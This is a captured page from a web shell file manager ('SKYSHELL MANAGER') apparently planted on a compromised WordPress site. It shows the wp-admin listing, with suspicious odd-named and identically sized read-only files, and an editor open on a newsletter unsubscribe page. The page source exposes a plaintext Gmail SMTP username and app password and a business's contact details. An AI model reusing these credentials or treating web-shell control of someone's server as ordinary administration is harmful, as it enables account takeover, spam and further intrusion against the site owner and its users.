📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: unsubscribe.php
<!DOCTYPE html> <html lang="en"> <head> <title>Dietnutris</title> <link rel="icon" type="image/x-icon" href="images/fav.ico"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content="Tooplate"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/animate.css"> <link rel="stylesheet" href="css/owl.carousel.css"> <link rel="stylesheet" href="css/owl.theme.default.min.css"> <!-- MAIN CSS --> <link rel="stylesheet" href="css/tooplate-style.css"> <style> #g-recaptcha-response { display: block !important; position: absolute; margin: -78px 0 0 0 !important; width: 302px !important; height: 76px !important; z-index: -999999; opacity: 0; } </style> <script> window.addEventListener('load', () => { const $recaptcha = document.querySelector('#g-recaptcha-response'); if ($recaptcha) { $recaptcha.setAttribute('required', 'required'); } }) </script> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <style> .dropdown { position: relative; display: inline-block; padding-top: 14px; } .dropdown-content { display: none; position: absolute; background-color: #f1f1f1; min-width: 260px; box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2); z-index: 1; } .dropdown-content a { color: black; padding: 12px 16px; text-decoration: none; display: block; } .dropdown-content a:hover {background-color: #ddd;} .dropdown:hover .dropdown-content {display: block;} </style> </head> <body id="top" data-spy="scroll" data-target=".navbar-collapse" data-offset="50"> <!-- HEADER --> <!-- MENU --> <section class="navbar navbar-default navbar-static-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="icon icon-bar"></span> <span class="icon icon-bar"></span> <span class="icon icon-bar"></span> </button> <!-- lOGO TEXT HERE --> <a href="index.php" class="navbar-brand"><img src="images/logo1.jpg" class="img-responsive"></a> </div> <!-- MENU LINKS --> <div class="collapse navbar-collapse"> <ul class="nav navbar-nav navbar-right"> <li><a href="index.php" class="smoothScroll">Home</a></li> <li><a href="about.php" class="smoothScroll">About Us</a></li> <li> <div class="dropdown"> <a class="smoothScroll">Work With Us</a> <div class="dropdown-content"> <a href="page1.php">Nutrition Counseling</a> <a href="page2.php">Nutrition Talks</a> <a href="page3.php">Health Professionals Mentoring</a> </div> </div> </li> <li><a href="page4.php" class="smoothScroll">Yoga & Meditation</a></li> <li><a href="contact.php" class="smoothScroll">Contact</a></li> <li class="appointment-btn"><a href="subscribe.php">Our Health Updates</a></li> </ul> </div> </div> </section> <!-- MAKE AN APPOINTMENT --> <section id="appointment" data-stellar-background-ratio="3"> <div class="container"> <div class="row"> <h2>Complete This Feed Back Form To Unsubscribe Our Newsletter</h2> <div class="col-md-6 col-sm-6"> <!-- CONTACT FORM HERE --> <form id="appointment-form" role="form" method="post" action="unsubscribe.php"> <!-- SECTION TITLE --> <div class="section-title wow fadeInUp" data-wow-delay="0.4s"> <h3>which type of problem you faced from us:</h3><br> <input type="checkbox" style="height: auto;"> <label>I am having difficulty receiving or viewing emails from us.</label><br> <input type="checkbox" style="height: auto;"> <label>Your emails are not relevant to me.</label><br> <input type="checkbox" style="height: auto;"> <label>I don't remember subscribing to receive emails from You.</label><br> </div> <div class="wow fadeInUp" data-wow-delay="0.8s"> <div class="col-md-12 col-sm-12"> <label for="name">Name</label> <input type="text" class="form-control" id="name" name="name" placeholder="Full Name"> </div> <div class="col-md-12 col-sm-12"> <label for="email">Email</label> <input type="email" class="form-control" id="email" name="email" placeholder="Your Email"> </div> <div class="col-md-12 col-sm-12"> <label for="Message">Message</label> <textarea class="form-control" rows="5" id="message" name="message" placeholder="Reason for Unsubscribe"></textarea> <div class="g-recaptcha" data-sitekey="6LfGZV0oAAAAAIdcjgvOY3CMzXByihbafnnn-cOD"></div><br> <button type="submit" class="form-control" id="cf-submit" name="Submit">Submit</button> </div> </div> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'anthonychavez@dietnutris.com'; // YOUR gmail email $mail->Password = 'tqgbztnlxxlcqtho'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('anthonychavez@dietnutris.com', 'Dietnutris'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('anthonychavez@dietnutris.com', 'Dietnutris'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Unsubscribe Replay [Success]"; $mail->Body = "<h2>Thank you for Unsubscribe us.</h2> <p>This message confirms that you have unsubscribed from the Dietnutris.</p>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Success! check your email."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'anthonychavez@dietnutris.com'; // YOUR gmail email $mail2->Password = 'tqgbztnlxxlcqtho'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('anthonychavez@dietnutris.com', 'Dietnutris'); $mail2->addAddress('anthonychavez@dietnutris.com', 'Dietnutris'); //$mail->addReplyTo('anthonychavez@dietnutris.com', 'Dietnutris'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Unsubscribe Details"; $mail2->Body = "<strong>Following user has been submitted Unsubscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </div> <div class="col-md-6 col-sm-6"> </div> </div> </div> </section> <!-- FOOTER --> <footer data-stellar-background-ratio="5"> <div class="container"> <div class="row"> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">What We Do</h4> <p>Our dedication to scientific research and innovation inspires our team of experts every day to develop nutrition products to help build and maintain health from infancy onward.</p> </div> </div> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">Navigation Links</h4> <p><a href="subscribe.php">Our Newsletter</a></p> <p><a href="page1.php">Nutrition Counseling</a></p> <p><a href="page2.php">Nutrition Talks</a></p> <p><a href="page3.php">Health Professionals Mentoring</a></p> <p><a href="page4.php" class="smoothScroll">Yoga & Meditation</a></p> </div> </div> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">Contact Info</h4> <div class="contact-info"> <p><i class="fa fa-phone"></i> (+91) 95975 46987</p> <p><i class="fa fa-envelope-o"></i> <a href="mailto:anthonychavez@dietnutris.com">anthonychavez@dietnutris.com</a></p> <p style="display: flex;"><i class="fa fa-map-marker"></i>No 12 Vinayagapuram,<br> Kalangarkarunanithi street,<br> Oorakadam, Aambathur,<br> Chennai, Tamilnadu, IN - 600053.</p> </div> </div> </div> <div class="col-md-12 col-sm-12 border-top"> <div class="col-md-4 col-sm-6"> <div class="copyright-text"> <p>Copyright © 2024 Dietnutris</p> </div> </div> <div class="col-md-6 col-sm-6"> <div class="footer-link"> <a href="privacy.php">Privacy Policy</a> <a href="terms.php">Terms & Conditions</a> </div> </div> <div class="col-md-2 col-sm-2 text-align-center"> <div class="angle-up-btn"> <a href="#top" class="smoothScroll wow fadeInUp" data-wow-delay="1.2s"><i class="fa fa-angle-up"></i></a> </div> </div> </div> </div> </div> </footer> <!-- SCRIPTS --> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer> </script> <script src="js/jquery.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.sticky.js"></script> <script src="js/jquery.stellar.min.js"></script> <script src="js/wow.min.js"></script> <script src="js/smoothscroll.js"></script> <script src="js/owl.carousel.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save